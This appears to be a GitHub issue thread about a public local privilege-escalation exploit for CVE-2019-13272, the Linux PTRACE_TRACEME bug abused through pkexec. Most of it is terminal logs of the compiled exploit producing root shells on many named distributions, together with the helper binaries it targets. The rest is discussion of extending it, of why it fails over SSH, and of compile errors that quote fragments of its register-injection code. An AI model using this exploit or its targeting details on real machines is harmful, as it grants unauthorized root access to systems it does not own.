Closed bcoles closed 4 years ago
/usr/lib/gnome-settings-daemon/gsd-backlight-helper
user@debian-10-0-0-x64:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
root@debian-10-0-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(user)
root@debian-10-0-0-x64:/home/user/Desktop/47133#
/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper
user@debian9-4-0-x64:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
root@debian9-4-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(lpadmin),117(scanner),1000(user)
/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper
user@devuan-2-0-0:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
root@devuan-2-0-0:/home/user/Desktop/47133#
/usr/bin/lxqt-backlight_backend
user@sparkylinux-5-x64:~/47133$ ./a.out
executing passwd
attached to midpid
root@sparkylinux-5-x64:/home/user/47133# id
uid=0(root) gid=0(root) groups=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(user)
root@sparkylinux-5-x64:/home/user/47133#
/usr/lib/unity-settings-daemon/usd-backlight-helper
user@ubuntu-16-04-5-x64:~/Desktop/kernel-exploits/CVE-2019-13272$ ./a.out
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[~] Using helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@ubuntu-16-04-5-x64:/home/user/Desktop/kernel-exploits/CVE-2019-13272#
/usr/lib/gnome-settings-daemon/gsd-backlight-helper
user@ubuntu:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@ubuntu:/home/user/Desktop/47133#
/usr/lib/gnome-settings-daemon/gsd-backlight-helper
user@ubuntu-19-04-x64:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@ubuntu-19-04-x64:/home/user/Desktop/47133#
/usr/sbin/mate-power-backlight-helper
user@ubuntu-mate-19-04-desktop-amd64:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@ubuntu-mate-19-04-desktop-amd64:/home/user/Desktop/47133#
/usr/sbin/mate-power-backlight-helper
user@linux-mint-19-2:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@linux-mint-19-2:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
root@linux-mint-19-2:/home/user/Desktop/47133#
/usr/lib/gnome-settings-daemon/gsd-backlight-helper
user@elementary-os-0-4-1-20170517:~/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@elementary-os-0-4-1-20170517:/home/user/47133# exit
/usr/libexec/gsd-wacom-led-helper
/usr/libexec/gsd-wacom-oled-helper
[user@localhost CVE-2019-13272]$ ./a.out
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/libexec/gsd-wacom-led-helper
[.] Spawning pkexec ...
[.] Tracing midpid ...
[~] Attached to midpid
[root@localhost CVE-2019-13272]# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
/usr/bin/xfpm-power-backlight-helper
[user@manjaro-xfce-18-0-3-x86-64 47133]$ ./a.out
executing passwd
attached to midpid
[manjaro-xfce-18-0-3-x86-64 47133]#
/usr/libexec/gsd-backlight-helper
[user@localhost 47133]$ ./a.out
executing passwd
attached to midpid
[root@localhost 47133]#
Antergos was recently EOL (last release 2019-04-04)
/usr/lib/gsd-wacom-oled-helper
/usr/lib/gsd-backlight-helper
[user@antergos 47133]$ ./a.out
executing passwd
attached to midpid
[root@antergos 47133]# id
uid=0(root) gid=0(root) groups=0(root),985(users),998(wheel)
[root@antergos 47133]# exit
Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro? I tried this briefly and unsuccessfully on Ubuntu 18.04
Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro? I tried this briefly and unsuccessfully on Ubuntu 18.04
Yes, I'll implement automatic targeting.
I downloaded the poc without modifications and it reboots my device (android pie), any idea if Android is vulnerable and if not, why?
fyi it works for me on ubuntu 18.04 as a logged in user, but not over ssh:
ssh user@vulnerable
user@ubuntu:~$ ./a.out
executing passwd
Error executing command as another user: Not authorized
This incident has been reported.
(I'm already logged in as the same user)
fyi it works for me on ubuntu 18.04 as a logged in user, but not over ssh:
Correct. Console lock is not sufficient for pkexec
. Need an active pkexec
session.
Updated C exploit here:
anyone who was able to make it work over SSH? POC?
are there any other binaries which meet the requirements like pkexec helpers which do not require active pkexec session? To make it work via ssh?
Updated C exploit here:
Cannot compile in aarch64
What's the error? What's the OS?
What's the error? What's the OS?
CVE-2019-13272.c:181:24: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
execl(pkexec_path, basename(pkexec_path), NULL);
^
CVE-2019-13272.c:181:24: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
execl(pkexec_path, basename(pkexec_path), NULL);
^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
^
CVE-2019-13272.c:198:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
^
CVE-2019-13272.c:198:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
^
CVE-2019-13272.c:215:38: error: no member named 'rsp' in 'struct user_regs_struct'; did you mean 'sp'?
unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
^~~
sp
/data/data/com.termux/files/usr/include/sys/user.h:242:12: note: 'sp' declared here
uint64_t sp;
^
CVE-2019-13272.c:233:8: error: no member named 'orig_rax' in 'struct user_regs_struct'
regs.orig_rax = __NR_execveat;
~~~~ ^
CVE-2019-13272.c:234:8: error: no member named 'rdi' in 'struct user_regs_struct'
regs.rdi = exec_fd;
~~~~ ^
CVE-2019-13272.c:235:8: error: no member named 'rsi' in 'struct user_regs_struct'
regs.rsi = scratch_area + offsetof(struct injected_page, path);
~~~~ ^
CVE-2019-13272.c:236:8: error: no member named 'rdx' in 'struct user_regs_struct'
regs.rdx = scratch_area + offsetof(struct injected_page, argv);
~~~~ ^
CVE-2019-13272.c:237:8: error: no member named 'r10' in 'struct user_regs_struct'
regs.r10 = scratch_area + offsetof(struct injected_page, envv);
~~~~ ^
CVE-2019-13272.c:238:8: error: no member named 'r8' in 'struct user_regs_struct'
regs.r8 = AT_EMPTY_PATH;
~~~~ ^
CVE-2019-13272.c:258:17: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
execlp(SHELL, basename(SHELL), NULL);
^
CVE-2019-13272.c:258:17: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
execlp(SHELL, basename(SHELL), NULL);
^~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:105:44: note: passing argument to parameter '__arg0' here
int execlp(const char* __file, const char* __arg0, ...) __attribute__((__sentinel__));
^
CVE-2019-13272.c:406:6: warning: implicit declaration of function 'strchrnul' is invalid in C99 [-Wimplicit-function-declaration]
*strchrnul(buf, '\n') = '\0';
^
CVE-2019-13272.c:406:5: error: indirection requires pointer operand ('int' invalid)
*strchrnul(buf, '\n') = '\0';
^~~~~~~~~~~~~~~~~~~~~
CVE-2019-13272.c:407:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
if (strncmp(buf, basename(helper_path), 15) == 0)
^
CVE-2019-13272.c:407:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
if (strncmp(buf, basename(helper_path), 15) == 0)
^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/string.h:137:44: note: passing argument to parameter '__rhs' here
int strncmp(const char* __lhs, const char* __rhs, size_t __n) __attribute_pure__;
^
9 warnings and 8 errors generated.
What's the error? What's the OS?
Android Pie with Linux kernel 4.9.106, using Termux terminal environment. gcc: clang-8
This exploit doesn't work on Android